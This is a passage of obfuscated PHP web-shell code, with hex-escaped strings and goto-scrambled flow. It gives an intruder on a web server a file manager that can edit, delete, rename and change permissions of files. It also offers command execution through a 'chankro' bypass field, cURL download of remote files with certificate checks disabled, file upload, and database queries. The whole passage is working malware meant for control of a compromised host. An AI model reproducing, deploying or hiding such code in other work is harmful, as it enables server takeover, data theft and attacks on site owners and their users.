"\47\x29\x3b\42\76\x3c\x69\40\x63\x6c\141\x73\x73\75\x22\x66\141\163\40\146\141\x2d\146\151\154\x65\x2d\x61\162\x63\150\x69\x76\x65\x22\x20\x73\164\x79\154\x65\75\42\143\x6f\x6c\x6f\x72\x3a\43\x46\106\x46\x46\106\106\73\42\x3e\x3c\57\151\x3e\x3c\x2f\x61\76\x20\x7c\40" . ("\x20\x3c\141\x20\x68\162\145\146\75\x22\152\141\x76\141\163\143\162\151\x70\x74\x3a\x64\145\x6c\145\164\x65\106\x6f\154\144\x65\162\x28\x27" . b526E9837163414e($Ce459421130034b2) . "\x27\51\x3b\42\76\x3c\x69\x20\x63\154\141\163\x73\x3d\x22\146\141\x73\x20\x66\x61\x2d\164\162\x61\x73\x68\55\x61\x6c\x74\42\x20\163\x74\x79\x6c\145\75\42\x63\x6f\154\157\162\72\x23\x46\106\x46\x46\106\106\x3b\x22\x3e\74\57\151\76\74\x2f\141\76"); goto Ca37c9491d8571ac; ba79b4164527c54b: Cdcf59f714731fe2: goto Af9a982a156f36f1; E11891c7a8b0e7b5: if ($fca0571418340603 == "\x2e\x2e") { goto D7ee1eff400232a9; } goto cf425e1046c28f80; f05cba2f69bc57c9: $c924a42b591c77bd = is_writable($Ce459421130034b2); goto F148343a786f6895; F3b9345831be4eb7: $c9c3dbf37270f221 = substr($f6f05644d791da73, strlen($f6f05644d791da73) - 1) != "\57" ? "\x2f" : ''; goto F7511be5696be5b1; Af9a982a156f36f1: $Ee2d8c1f56507757 = @posix_getpwuid(@fileowner($Ce459421130034b2)); goto a5343cdd945fb077; B1b0788fac139c89: print "\74\164\x72\76\74\164\144\x3e"; goto Eada53453903a30e; F7511be5696be5b1: $Ce459421130034b2 = $f6f05644d791da73 . $c9c3dbf37270f221 . $fca0571418340603; goto f05cba2f69bc57c9; e8136fae02e8b8ca: goto F742e4aff01eb46f; goto bf604e0a4ae0180c; caa96895d05ce6eb: print "\74\57\x74\144\x3e\xd\12\40\x20\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\x20\x20\40\40\x20\x20\x20\40\x20\40\x20\74\164\144\x20\x73\164\x79\154\x65\75\x22\143\157\154\157\162\72" . $F4b5f0915f10d2ff . "\x3b\x22\x3e\15\xa\40\x20\x20\40\40\40\x20\40\40\40\x20\40\40\x20\x20\40\40\40\x20\40\40\x20\40\x20\x20\40\x20\x20\74\x61\x20\x68\162\x65\x66\x3d\42\152\x61\x76\141\x73\x63\162\151\x70\164\72\x3b\x22\40\157\x6e\x63\154\151\x63\x6b\75\42\x63\150\141\x6e\147\x65\120\145\x72\x6d\151\x73\x73\151\157\156\x73\x28\x27" . B526E9837163414E($fca0571418340603) . "\x27\x2c\x20\x27" . $C47c797fb6898f03 . "\x27\51\42\x20\163\164\171\x6c\x65\75\42\x63\157\x6c\x6f\x72\x3a\40\x69\x6e\150\145\x72\x69\x74\73\x20\x74\145\170\x74\x2d\144\145\143\157\162\141\164\151\x6f\x6e\72\x20\156\157\156\x65\x3b\40\x63\165\x72\x73\x6f\162\x3a\x70\157\x69\156\164\x65\162\x3b\42\76" . $C47c797fb6898f03 . "\x3c\x2f\x61\x3e\15\12\x20\x20\40\40\40\x20\x20\40\x20\x20\x20\40\40\40\40\40\x20\40\40\x20\40\x20\40\40\74\57\164\x64\x3e\xd\12\x20\x20\40\x20\40\40\40\x20\x20\x20\40\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x20\74\x74\x64\76"; goto Fbb62c7ef5acb9a6; E05a241976cfbea2: goto d1bc2e6adc37cc72; goto F1d613c4f7a4d47b; bf604e0a4ae0180c: D7ee1eff400232a9: goto afdb28cfef8155ec; A944c494b3a9f8b4: d1bc2e6adc37cc72: goto fdb9f3331bc05e0d; A76e9e481d3bfd55: goto e1df13416ad5f93f; goto c0086bfad0cfaf4c; cb26a791624dd0a3: F52668fd2b1e90e4: goto caa96895d05ce6eb; dc3b83bea4236f73: if (function_exists("\160\x6f\163\151\170\137\x67\x65\164\160\x77\165\151\144") && function_exists("\160\x6f\163\151\x78\x5f\x67\145\164\147\162\x67\151\144")) { goto Cdcf59f714731fe2; } goto B503167e4131305a; B503167e4131305a: echo "\x4e\57\x41"; goto be55b32d744a8348; cf425e1046c28f80: $Ea899c77f80d8c33 = B526E9837163414E($Ce459421130034b2); goto e8136fae02e8b8ca; Eada53453903a30e: if ($fad9bef7b6f5fd66["\151\163\x5f\x64\151\x72"]) { goto D790fc448fe0d361; } goto bcff3c62ea74a6d5; F1d613c4f7a4d47b: B1c43bc3be9ea3f4: goto c5c835b69205f8b9; F148343a786f6895: $F4b5f0915f10d2ff = $c924a42b591c77bd ? "\43\x30\60\x46\x46\60\x30" : "\43\106\x46\x30\60\x30\x30"; goto d52567b2ee739109; d52567b2ee739109: $C47c797fb6898f03 = substr(sprintf("\45\x6f", @fileperms($Ce459421130034b2)), -4); goto B1b0788fac139c89; be55b32d744a8348: goto F52668fd2b1e90e4; goto ba79b4164527c54b; A0e99d6475d141f7: print "\74\141\x20\x68\162\145\x66\75\42\152\x61\x76\x61\163\143\162\151\x70\x74\72\156\141\166\151\147\x61\x74\145\x28\x27\x62\x65\162\x6b\141\x73\x27\x2c\x20\x27" . $Ea899c77f80d8c33 . "\x27\51\42\x20\x73\x74\171\154\x65\x3d\42\146\157\156\164\x2d\167\145\x69\147\x68\164\72\66\x30\x30\73\40\x63\x6f\x6c\x6f\162\72\43\x46\106\106\x46\106\x46\x3b\x22\76" . htmlspecialchars($fca0571418340603) . "\x3c\x2f\x61\x3e"; goto E5640ccc0545083b; c5c835b69205f8b9: print "\x20\74\x61\40\150\x72\x65\146\75\42\152\x61\166\x61\163\143\x72\x69\160\164\x3a\x6e\x61\166\151\147\141\164\145\x28\47\141\167\x61\x6c\x27\x2c\40\x27\144\x6f\x77\x6e\x6c\157\x61\x64\x5f\146\151\154\x65\x27\x2c\40\47\x66\x61\x79\154\x27\54\40\47" . B526E9837163414E($fca0571418340603) . "\47\x2c\40\x27\142\x65\x72\x6b\141\163\47\54\x20\x27" . B526e9837163414e($f6f05644d791da73) . "\x27\51\x22\76\x3c\x69\40\143\x6c\141\163\x73\x3d\42\146\x61\163\40\146\x61\x2d\144\157\167\156\154\157\141\144\x22\x20\x73\164\x79\x6c\145\x3d\42\143\157\x6c\x6f\x72\x3a\43\x46\x46\x46\106\106\x46\x3b\x22\x3e\74\57\x69\x3e\x3c\x2f\x61\76\40\174\40" . ("\40\x3c\x61\x20\150\162\145\146\x3d\x22\152\141\166\x61\x73\x63\x72\x69\x70\x74\72\156\x61\x76\151\147\141\164\145\x28\x27\141\x77\x61\154\47\54\x20\47\x65\144\151\x74\x5f\x66\x69\x6c\x65\47\x2c\40\x27\146\141\x79\154\x27\x2c\x20\47" . b526E9837163414E($fca0571418340603) . "\47\x2c\x20\47\142\145\162\x6b\141\163\x27\54\40\47" . b526e9837163414e($f6f05644d791da73) . "\x27\x29\x3b\42\76\74\151\40\143\x6c\141\x73\x73\x3d\x22\146\141\163\40\146\x61\55\x70\x65\x6e\42\40\163\x74\171\154\x65\75\x22\143\157\154\x6f\x72\x3a\x23\106\x46\106\x46\x46\106\73\x22\x3e\x3c\57\151\x3e\x3c\57\x61\76\x20\174\x20") . ("\x20\x3c\x61\40\x68\162\x65\146\x3d\x22\152\141\x76\x61\163\x63\x72\151\x70\x74\x3a\143\150\141\x6e\x67\x65\x46\x69\154\x65\x4e\x61\x6d\145\50\x27" . htmlspecialchars($fca0571418340603) . "\47\54\40\47" . b526e9837163414E($fca0571418340603) . "\x27\51\x3b\42\x3e\74\x69\40\143\154\x61\x73\163\75\x22\146\141\x73\40\146\x61\55\151\55\x63\165\162\163\x6f\162\42\40\163\164\171\154\145\x3d\42\x63\x6f\154\x6f\162\72\43\106\106\106\x46\x46\x46\x3b\42\76\74\x2f\x69\x3e\x3c\x2f\x61\76\x20\174\x20") . ("\x20\74\141\40\150\162\x65\146\75\x22\x6a\x61\x76\141\x73\143\x72\151\x70\164\72\144\145\154\145\164\x65\x46\151\x6c\x65\50\47" . b526e9837163414e($fca0571418340603) . "\x27\x29\73\x22\76\74\x69\40\x63\x6c\x61\163\163\x3d\42\146\141\163\x20\146\141\55\x74\x72\141\163\x68\55\x61\x6c\164\42\40\x73\x74\x79\154\x65\75\x22\143\157\154\157\x72\72\x23\x46\x46\x46\x46\x46\106\x3b\42\x3e\x3c\x2f\151\76\x3c\x2f\141\x3e"); goto A944c494b3a9f8b4; a5343cdd945fb077: $f555060cc786f96d = @posix_getgrgid(@filegroup($Ce459421130034b2)); goto Be1caaa0d64b990f; Beebd5d0b7e2d5c6: $fca0571418340603 = $fad9bef7b6f5fd66["\156\x61\155\145"]; goto F3b9345831be4eb7; Fbb62c7ef5acb9a6: if (is_file($Ce459421130034b2)) { goto B1c43bc3be9ea3f4; } goto e6dfdc8ac9c68c7b; fdb9f3331bc05e0d: print "\x3c\57\x74\144\76\74\57\164\162\x3e"; goto edf19e24b31e1b74; ab4a36340015c225: print "\x3c\x2f\x74\x64\76\15\xa\40\40\40\40\x20\x20\x20\40\x20\x20\40\40\40\40\x20\40\40\40\40\40\x20\x20\x20\x20\74\164\144\x3e" . A6427dA082F2ef1f(@filesize($Ce459421130034b2)) . "\x3c\57\164\x64\76\xd\12\x20\x20\40\40\x20\40\40\40\40\40\x20\x20\40\x20\40\x20\40\x20\x20\40\40\40\x20\40\74\x74\x64\76" . date("\144\x20\x4d\40\131\54\40\110\72\151", @filemtime($Ce459421130034b2)) . "\74\57\164\144\76\xd\12\40\40\x20\40\x20\40\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\x20\40\40\x20\40\x20\x20\x3c\x74\144\x3e"; goto dc3b83bea4236f73; e6dfdc8ac9c68c7b: if (!($fca0571418340603 != "\x2e" && $fca0571418340603 != "\56\x2e")) { goto F98e8a995a5abc4c; } goto E84cff7432e6450c; A12f1895ef8c2009: } goto Aa4b249800a826b0; e33d456519f0a6c8: bbedb58fb5f25fb9: goto Ebd8b4b78f5f3b0a; E029867d1a15f376: E7de99818e67e41e: goto bafe97c3d8dcbe7b; E277e0d3e6de16c9: $Cb7c56c153b6fafa = ''; goto d5635573bd42df43; Ac593d51be01a4b7: Ce7d3ae9f9b7e309: goto F812223672c7a58a; C58fbb1af36df872: function A6801581813b0ACE($C6f747fb516bf86f) { goto fd2ab43ef27f540e; Abf2717f50788072: D12743baedb0bbf3: goto f0cb3f581a4a2588; A4376d382bfa7867: ee4a188538ff18e2: goto Abf2717f50788072; A5906aa0b672c9b5: return utf8_encode($C6f747fb516bf86f); goto Ee3e713a61b79869; eea5c83afe8aa1f4: foreach ($C6f747fb516bf86f as $adbed09870d3ae8d => $E1f633c3c05bdb69) { $C6f747fb516bf86f[$adbed09870d3ae8d] = a6801581813B0aCE($E1f633c3c05bdb69); B8b3498f83e3f1ed: } goto A4376d382bfa7867; D1711592f880538f: goto D12743baedb0bbf3; goto Fadda751e88cb5f8; Ee3e713a61b79869: D1f0cafec074fc32: goto D1711592f880538f; f0cb3f581a4a2588: return $C6f747fb516bf86f; goto Ad4824496b88696e; bb07b725cacab657: if (!is_string($C6f747fb516bf86f)) { goto D1f0cafec074fc32; } goto A5906aa0b672c9b5; fd2ab43ef27f540e: if (is_array($C6f747fb516bf86f)) { goto F20f3d45cd88ceff; } goto bb07b725cacab657; Fadda751e88cb5f8: F20f3d45cd88ceff: goto eea5c83afe8aa1f4; Ad4824496b88696e: } goto f74a527a595ccc23; c5bd50026601ce45: a6ff6a88a2a6d9dd: goto b440476da7d3eb2c; b5f3c03bd38bf75a: echo "\40\x20\x20\40\x3c\146\157\162\155\40\141\143\164\151\x6f\x6e\75\x22\x22\40\x6d\145\x74\x68\157\144\x3d\42\x70\157\163\x74\42\x20\163\x74\171\154\x65\75\42\x70\x61\x64\x64\x69\x6e\147\72\x30\x3b\40\155\x61\162\x67\151\156\x3a\60\x3b\42\x3e\xd\12\x20\40\x20\40\40\40\x20\x20\74\x64\151\x76\x20\x63\x6c\x61\x73\x73\75\42\x74\145\162\155\x69\x6e\141\154\55\151\156\x70\165\x74\55\141\162\x65\141\42\x3e\15\xa\x20\x20\x20\x20\40\x20\40\40\x20\40\40\x20\x3c\151\156\x70\x75\164\40\164\171\x70\145\75\x22\x68\151\x64\144\145\x6e\42\x20\156\x61\155\x65\75\42\x61\x77\x61\154\42\x20\166\141\x6c\165\145\75\42\x63\150\141\156\x6b\x72\x6f\x5f\x6b\157\155\x22\76\xd\xa\40\x20\x20\40\x20\40\40\x20\40\x20\40\x20\x3c\x69\156\x70\x75\164\40\x74\x79\x70\145\75\42\x68\x69\x64\144\x65\156\x22\x20\156\x61\x6d\145\x3d\42\142\x65\162\153\x61\163\42\x20\166\141\x6c\x75\x65\75\x22"; goto eaceacea5c957d93; e391b9ad8de5129d: Bb9ebec764dd202a: goto de1bb291cb55e6db; fbdfbdf3ad4014bc: setcookie("\150\x6f\x73\x74", $D83b9efcbcab33a5, time() + 360000); goto b233a13d3c790845; Eaeaf17be9a71efc: goto b65ab4433953641f; goto af23d8d7ca2089d9; Fce69b935fb92a4e: echo htmlspecialchars($f6f05644d791da73); goto B49685552e62221f; Aa303ce42841664a: $dc0f70f3261828f3 = basename(f64198cb3E765a83($_POST["\146\141\x79\x6c"])); goto e6c9a811f2faed16; ceefc1288957dc3f: goto b4cbe7078613c9dc; goto A1b0c62a1787c0e6; e7834e251ef84476: goto Daaeb5f15d97371c; goto Adbe3f056b106db8; Acb4b298657eb96d: print "\74\164\x72\76\x3c\x74\x64\x20\x63\157\154\163\x70\141\x6e\x3d\47\x36\x27\76\x3c\x64\x69\x76\40\x73\164\171\x6c\145\75\x27\x6d\141\x72\x67\151\x6e\x3a\40\61\x72\145\x6d\x20\60\160\x78\73\47\40\143\x6c\x61\x73\163\x3d\47\161\x61\x6c\151\156\47\76\120\x65\162\x6d\151\163\x73\x69\x6f\x6e\x20\144\145\156\x69\145\144\41\74\57\x64\151\166\x3e\74\57\164\x64\76\74\x2f\164\162\x3e"; goto f3d5b2599b73039f; a622c3f1d8cc2a0c: A5d9e774682AEDAf(trim($_POST["\143\150\x61\156\x6b\162\x6f\x5f\x63\x6f\x6d\x6d\141\156\144"]), $f6f05644d791da73); goto F4a3108ea02965be; dee45c3075fc0d8f: B2b6508c5b672564: goto aff173a165393552; Ff0ef66b2f103f12: echo htmlspecialchars($F6a7e6021bba997d); goto Dc613eafbeb063e8; C5911ee5cd6045cb: E7834b696c79c069: goto F49d9fde9045d2e8; C683cb6cd15bf1e2: Ce4402264d4e2918: goto e3cfd139a6f5f23d; E3f263e0f8d6e796: goto e20b1cc373c122e5; goto b9666080e1d7a90c; d74609f08cd02684: D9d56b8452fab038: goto dbf9d3445768455f; Aff28a6179a22640: e8c3dde14ef98727: goto Ab0413d86d912391; c82c1543206fe0c5: print "\x3c\144\x69\166\40\143\154\x61\163\x73\75\x22\x74\145\162\155\151\x6e\141\x6c\55\x69\156\x70\165\x74\55\x61\162\145\x61\42\76"; goto A5b48905b7de127d; db975c392502becf: if (!empty($e7fc7ef47502e99b) && !empty($Cb7c56c153b6fafa)) { goto c22c422f6a120982; } goto ba83a358ca45bf9b; a6a7f365989bc334: echo "\15\12\x3c\x64\151\166\40\x63\154\141\x73\163\75\x22\x70\x61\x74\150\x2d\144\x69\163\160\x6c\x61\x79\55\x63\x6f\156\164\141\x69\156\145\162\42\x3e\xd\xa\40\40\40\40\x3c\x69\x20\143\154\x61\163\x73\75\42\x66\141\x73\40\x66\x61\x2d\x66\x6f\x6c\x64\145\x72\x2d\157\x70\145\x6e\x22\x3e\74\57\151\76\15\12\x20\40\40\x20\74\x70\x3e\xd\12\x20\40\40\40\x20\40\x20\40"; goto ccbfe38c33aedff2; C1a6ba6054c6202e: f5a7cd0e5c6e3c0c: goto a57283409925b91e; c72303065ac0c9c3: set_time_limit(0); goto C9910812393d75a2; Dc613eafbeb063e8: echo "\x3c\57\x73\160\x61\156\76\15\12\x20\x20\x20\x20\x20\x20\x20\x20\x3c\57\x70\76\15\xa\40\x20\40\x20\x20\x20\x20\x20\x3c\160\76\15\12\x20\40\40\x20\40\x20\40\40\x20\x20\x20\40\74\x73\x74\162\x6f\x6e\147\40\x73\x74\171\154\x65\x3d\x22\x63\157\x6c\157\162\72\x20\x23\x30\x30\106\x46\x30\60\73\x22\76\123\x65\x72\x76\145\162\x20\123\x6f\x66\164\167\141\162\x65\x3a\74\x2f\x73\164\x72\157\156\147\76\15\xa\40\x20\40\x20\40\40\x20\x20\40\x20\40\40\74\x73\160\x61\x6e\x20\x73\164\171\154\145\75\x22\x63\x6f\154\x6f\x72\72\x20\43\146\146\x66\x66\x66\146\x3b\x22\x3e"; goto cddced8049f498d6; C02a39375a29b4d9: goto A159bc8e24a089cb; goto c949ab667914e631; ac0b80bddab42b16: $a1cb9ff287442a69 = basename(f64198cB3E765a83($_POST["\x61\144"])); goto E1fb23ae0358b5c1; Cad84209fce10195: $ffe0def0151bb0bd = $_POST["\x66\145\164\143\150\x5f\x75\162\x6c"]; goto Cb9acd71e04505bc; de4175a8b6cf7c73: echo b526e9837163414E($f6f05644d791da73); goto Be422406782a7ad5; B3122b329c6f3a9c: goto e49a14b07b491b78; goto f1d965865dc14af2; c7dde12374d4b5de: echo "\x27\51\73\xd\xa\11\x7d\15\xa\175\15\xa\xd\xa\x66\165\x6e\143\x74\151\x6f\156\40\x73\153\x6c\137\142\x61\x73\x28\51\15\12\x7b\xd\12\x9\166\x61\162\x20\x73\153\x6c\105\x6d\x72\x20\75\x20\144\157\143\165\155\x65\156\x74\x2e\147\x65\164\x45\154\145\x6d\145\156\x74\102\x79\x49\x64\50\x27\x73\153\154\x5f\x65\155\162\47\51\x2e\x76\141\154\165\x65\x3b\15\xa\x9\156\141\x76\x69\x67\141\164\x65\50\x27\141\167\x61\x6c\47\54\x20\x27\x73\153\x6c\47\54\x20\47\145\155\x72\47\x2c\x20\x62\66\64\105\x6e\x63\157\x64\145\x55\x6e\x69\143\x6f\x64\145\x28\x73\153\154\105\x6d\162\51\54\40\47\x64\x61\x74\141\x62\141\x73\145\x27\x2c\x20\47"; goto C448479f0a447f72; ad785c4b1b096690: $C0b787c0767b5b3d = BECC62336785b14e($c17121c8c5afcfe3, "\x44\x42\x5f\110\117\x53\x54"); goto e837663c7d95ce4a; f42e99074ccb7a6b: $Bccc85b4b8696c74 = @posix_getgrgid(@posix_getegid()); goto c1c02541f68d6ded; Acb44bf6a33c104c: print "\x3c\57\x64\x69\x76\x3e"; goto c82c1543206fe0c5; fa54dd5a356a9945: c0396e518be7ff92: goto Cd9f8230e0ac4844; F9d0a285c48c2b42: goto C9980f4bfea186cd; goto e391b9ad8de5129d; A036aad70dc8bf83: E4f5bbfe2bd5bab7: goto C659e3ba08730e06; D23e4ee90d29bff6: $ed2bb87ff019245b = "\x46\x69\x6c\x65\40\x3c\163\164\x72\x6f\156\147\x3e{$d8463d93c69599f9}\74\57\163\x74\162\x6f\156\x67\x3e\40\x75\160\154\x6f\x61\144\145\x64\x20\x73\x75\x63\x63\145\x73\x73\146\165\154\154\171\x20\x75\x73\151\x6e\x67\x20\146\141\154\154\142\x61\143\x6b\40\x6d\x65\164\x68\157\144\40\x66\151\x6c\145\137\147\145\x74\137\x63\157\156\x74\x65\x6e\164\x73\50\x29\40\x61\x6e\144\40\146\x69\154\x65\x5f\160\x75\164\x5f\143\157\x6e\x74\145\x6e\164\x73\x28\51\56"; goto Edcd885dce7ed8f0; Bd3c45c42bd72a23: goto e39776711e6bd8bf; goto cb1f2608ba212958; A47a7dae38288a9b: d71da4e0e11a1af8: goto Acf4317685f682eb; F6c1ae69b3ef17a1: E827728de818a895: goto a58100c74573de7e; Adbe3f056b106db8: da35e10a6c56735c: goto A7dd97e3aa47a853; Df2ac92da03136aa: ini_set("\x75\160\x6c\x6f\x61\x64\x5f\x6d\141\x78\137\146\151\154\x65\163\151\x7a\145", "\x36\x34\115"); goto Da65b2e33124cd9d; bcf2d566b962d1e2: goto Fd82c8d7feb8b771; goto afb2f81335d499e3; d7852b92bb2c5c52: f5323f75992a522b: goto Fa3f52b17b06b820; Fa0c3c344630205d: echo htmlspecialchars(phpversion()); goto a5677e241df3294e; D88aae6454cc2870: if (!empty($D4923a741daf1b7e)) { goto F598d410b8963057; } goto E87f52f294ef1c9d; cb7e501b1c20e9d5: try { goto abdf7adf9079ae49; D18d32966ee7d837: Ed7de661fd6f204b: goto E3c3e4de279fe139; B1ec22d2c913260a: $c67cc4b94b9ffbab = curl_exec($c63e0a2deefd420f); goto D54f5549eb32b1cd; D54f5549eb32b1cd: curl_close($c63e0a2deefd420f); goto a82e2645d36d02aa; F83c946906e5f6f1: curl_setopt($c63e0a2deefd420f, CURLOPT_FOLLOWLOCATION, true); goto e3347b0facb20ab3; C2ff39c5b6753628: $c63e0a2deefd420f = curl_init($ffe0def0151bb0bd); goto A91b2223b2725e9d; F7cef99053f2097d: if ($c67cc4b94b9ffbab) { goto B7272479b837f4d5; } goto bb3fa8aec8a09461; Bf37fed6d62eb417: goto Ed7de661fd6f204b; goto D9fbd1bdf46a2e9b; e3347b0facb20ab3: curl_setopt($c63e0a2deefd420f, CURLOPT_TIMEOUT, 60); goto Fb47c3995b544674; Fb47c3995b544674: curl_setopt($c63e0a2deefd420f, CURLOPT_SSL_VERIFYPEER, 0); goto fa14e9fc9870b40f; E417b11b35fc88d2: $a8a9fc47be90efed = true; goto D18d32966ee7d837; c7a90fbee8675dd5: $c31208d29cfc6afb = "\106\151\154\x65\40\x64\x6f\167\x6e\x6c\157\141\144\145\x64\x20\163\165\143\143\145\x73\163\146\x75\154\154\x79\40\x76\151\141\40\143\x55\x52\x4c\x20\x61\x6e\x64\40\163\141\166\145\x64\x20\141\x73\x20\x3c\163\164\162\157\156\147\76" . htmlspecialchars($D4923a741daf1b7e) . "\74\57\163\x74\x72\157\x6e\x67\x3e"; goto E417b11b35fc88d2; D9fbd1bdf46a2e9b: B7272479b837f4d5: goto c7a90fbee8675dd5; a82e2645d36d02aa: fclose($A26d6de10d4daa11); goto F7cef99053f2097d; abdf7adf9079ae49: $A26d6de10d4daa11 = fopen($F3d3e5ac6e86bc72, "\x77"); goto C2ff39c5b6753628; fa14e9fc9870b40f: curl_setopt($c63e0a2deefd420f, CURLOPT_USERAGENT, "\115\157\x7a\151\154\x6c\x61\x2f\x35\56\60\40\x28\x57\x69\x6e\x64\157\167\163\x20\116\x54\x20\61\60\x2e\60\73\40\127\x69\156\x36\64\x3b\40\x78\x36\64\x29\40\101\160\160\154\145\127\x65\x62\x4b\x69\x74\57\x35\x33\x37\56\63\x36\x20\50\x4b\x48\x54\115\114\54\x20\x6c\x69\x6b\145\x20\107\x65\143\x6b\x6f\51\40\103\150\162\157\x6d\x65\57\65\x38\56\60\x2e\x33\60\x32\71\56\61\61\x30\40\123\141\146\x61\162\x69\x2f\x35\63\67\56\x33\66"); goto B1ec22d2c913260a; bb3fa8aec8a09461: @unlink($F3d3e5ac6e86bc72); goto Bf37fed6d62eb417; A91b2223b2725e9d: curl_setopt($c63e0a2deefd420f, CURLOPT_FILE, $A26d6de10d4daa11); goto F83c946906e5f6f1; E3c3e4de279fe139: } catch (Exception $E4d444a4fd968be8) { } goto Fe8ffea884681322; Edc5b0735f740023: if ($ffc943dc0b3a48b0 == "\x62\x75\x61\x74\137\146\x69\154\x65" && isset($_POST["\156\x65\x77\x5f\146\x69\x6c\145\x6e\141\x6d\x65"]) && !empty($_POST["\x6e\x65\x77\137\146\151\154\145\156\x61\x6d\145"])) { goto B45230fdbaedcf04; } goto df40df0c731dbf8b; efec42e4188b22ac: echo "\104\x69\163\x61\x62\154\x65\144"; goto B4c1448a09494308; afbb7eab1ad96d17: $D4923a741daf1b7e = isset($_POST["\163\x61\166\x65\137\x61\163"]) ? basename(trim($_POST["\163\141\166\145\137\141\163"])) : ''; goto D4576e2c25f322ef; ed2460a9a49b0bac: echo $A62259e1f87e5d26; goto d2fbace3c2bf7f8a; d33af2e1422d6980: if (!file_exists($A28aed829b792880)) { goto b3664044183afc0d; } goto E0701b14a219ee57; ffd068342141eb6c: b65ab4433953641f: goto a72ae8ca23092371; C46eefeccdfa7d29: $d139b1a848d82cf6 = F64198cb3E765a83($_POST["\163\141\166\145\x5f\164\x6f"]); goto dfdfedadfee45198; D537f03bf513ba91: print str_replace("\x3c\x68\63\76\162\x65\x73\x75\154\x74\x3a\74\x2f\x68\x33\x3e", '', $C9e0fa31b09f0955); goto C1a6ba6054c6202e; Aebf76336bea183f: $c9c3dbf37270f221 = substr($f6f05644d791da73, strlen($f6f05644d791da73) - 1) != "\x2f" ? "\x2f" : ''; goto f5c8a3044258d670; C32b79b4b4e1023c: echo "\42\76\xd\xa\x20\x20\40\x20\x20\x20\40\40\74\151\x6e\x70\x75\164\x20\164\171\x70\145\75\x22\x74\x65\170\x74\x22\40\x6e\x61\155\145\75\42\x66\x65\164\x63\x68\x5f\165\162\154\42\40\x70\x6c\141\143\x65\150\157\x6c\x64\145\x72\75\42\x45\x6e\x74\x65\x72\x20\146\x75\154\x6c\40\x55\122\x4c\40\164\x6f\x20\x64\x6f\x77\156\x6c\x6f\141\x64\56\56\x2e\42\x20\x72\145\x71\x75\x69\x72\145\144\40\x73\164\x79\154\x65\75\x22\x66\x6c\x65\x78\55\x67\162\x6f\167\72\x20\61\x3b\x20\155\141\162\x67\x69\x6e\72\40\x30\73\x22\x3e\15\12\40\40\40\x20\x20\x20\40\40\x3c\151\156\160\165\x74\x20\164\x79\160\x65\x3d\x22\x74\145\x78\x74\x22\40\x6e\x61\x6d\145\x3d\42\x73\x61\166\x65\137\x61\163\42\x20\x70\154\141\x63\145\x68\x6f\154\x64\145\162\75\42\x53\x61\x76\145\x20\141\163\x20\x28\157\160\164\x69\x6f\x6e\x61\x6c\x29\56\x2e\56\42\x20\x73\x74\171\154\x65\x3d\42\x66\154\145\170\x2d\x67\162\x6f\167\x3a\40\x30\x2e\65\73\40\155\x61\x72\x67\151\x6e\x3a\40\x30\x3b\x22\76\15\12\40\x20\x20\x20\x20\40\40\x20\74\x62\x75\x74\x74\x6f\x6e\x20\164\171\x70\x65\x3d\42\163\x75\x62\155\x69\x74\42\40\x63\154\141\x73\x73\75\42\142\x74\156\55\x6d\x6f\144\145\162\x6e\42\76\74\x69\x20\143\154\x61\x73\x73\75\42\x66\x61\163\x20\x66\x61\x2d\x64\x6f\167\x6e\x6c\157\141\x64\x22\76\x3c\x2f\151\76\x20\x46\x65\x74\143\150\x3c\57\x62\x75\164\164\157\156\76\15\12\40\40\x20\40\74\x2f\146\157\x72\x6d\x3e\xd\12\x3c\57\144\151\166\76\15\12\xd\xa\xd\xa\74\x64\x69\166\40\151\144\x3d\x22\x75\160\154\x6f\141\x64\103\x6f\x6e\x74\x61\x69\156\145\162\42\x20\163\164\x79\154\145\75\x22\x64\151\x73\x70\x6c\141\171\72\156\x6f\x6e\145\73\40\x70\141\x64\144\x69\x6e\147\72\x20\x31\x2e\62\x72\x65\x6d\73\42\x3e\xd\12\x20\40\x20\x20\x3c\x64\x69\x76\40\151\x64\75\x22\x75\x70\x6c\157\x61\144\x2d\x70\x61\x6e\145\x6c\x22\x20\143\x6c\141\163\x73\75\42\165\x70\x6c\157\141\144\55\160\x61\x6e\145\154\42\x3e\15\12\x20\x20\x20\40\40\x20\x20\x20\74\146\x6f\x72\155\40\x69\x64\75\x22\x61\152\x61\x78\x55\160\x6c\157\x61\x64\106\x6f\x72\155\42\40\155\145\x74\150\157\144\x3d\42\120\x4f\x53\124\42\x20\145\x6e\x63\164\x79\x70\x65\x3d\42\155\165\154\164\151\x70\141\x72\164\57\146\x6f\162\155\x2d\144\x61\x74\141\x22\x20\141\143\x74\151\157\156\x3d\42"; goto da2587f6444961d2; Aab598515e1444cb: var_dump($d139b1a848d82cf6); goto da3d519ae3dc0eb6; c949ab667914e631: a2265460f426a6fd: goto D91f8a0d84ae444d; cdefdc67c0a35245: $Cb7c56c153b6fafa = isset($_COOKIE["\x64\x61\x74\141\x62\141\x73\145"]) ? $_COOKIE["\x64\x61\164\x61\142\141\163\145"] : ''; goto a10694c6e65c987e; cdda6c2cdb10cda3: $c9c3dbf37270f221 = substr($f6f05644d791da73, strlen($f6f05644d791da73) - 1) != "\x2f" && substr($dc0f70f3261828f3, 0, 1) != "\x2f" ? "\x2f" : ''; goto Dedb6af3a75ca41b; Bb9b700a6678432c: f63857cc21aa6eb8: goto ba5e7a9d93f73125; Db4e8ef6fcfd5077: unset($_SESSION["\x79\163\137\x74\x6f\157\x6b"]); goto abacec14d3431d6f; a10694c6e65c987e: $a5064888437638ee = empty($Cb7c56c153b6fafa) ? '' : "\144\142\x6e\141\155\145\x3d" . $Cb7c56c153b6fafa . "\x3b"; goto Ae3517bd3cfbf1a3; cc436186d58805ef: goto bbedb58fb5f25fb9; goto d74609f08cd02684; E494db05aaffb67a: $ffc943dc0b3a48b0 = "\x73\x6b\x6c"; goto ffd068342141eb6c; Bf16b2d2f9e088ee: $c31208d29cfc6afb = "\x46\157\x6c\144\145\162\40\x27" . htmlspecialchars($C9352652ce72a34c) . "\47\40\141\x6e\x64\x20\x69\x74\163\40\x63\x6f\x6e\x74\x65\156\164\163\40\144\145\x6c\x65\x74\x65\144\x20\x73\165\143\x63\x65\163\x73\x66\165\154\154\x79\56"; goto D69d4f98eeedc1ce; e2204595d1020ad0: try { goto Cc8b6717d672a581; Cd7fa292a846fe29: echo json_encode($Bae9033c3cf95c45); goto Af6c08057a8ba7b2; cbb07897dd8d4e97: $Bae9033c3cf95c45 = $Bae9033c3cf95c45->fetchAll(); goto dd4e88cd4727de2e; D62e1986f09ab5c5: 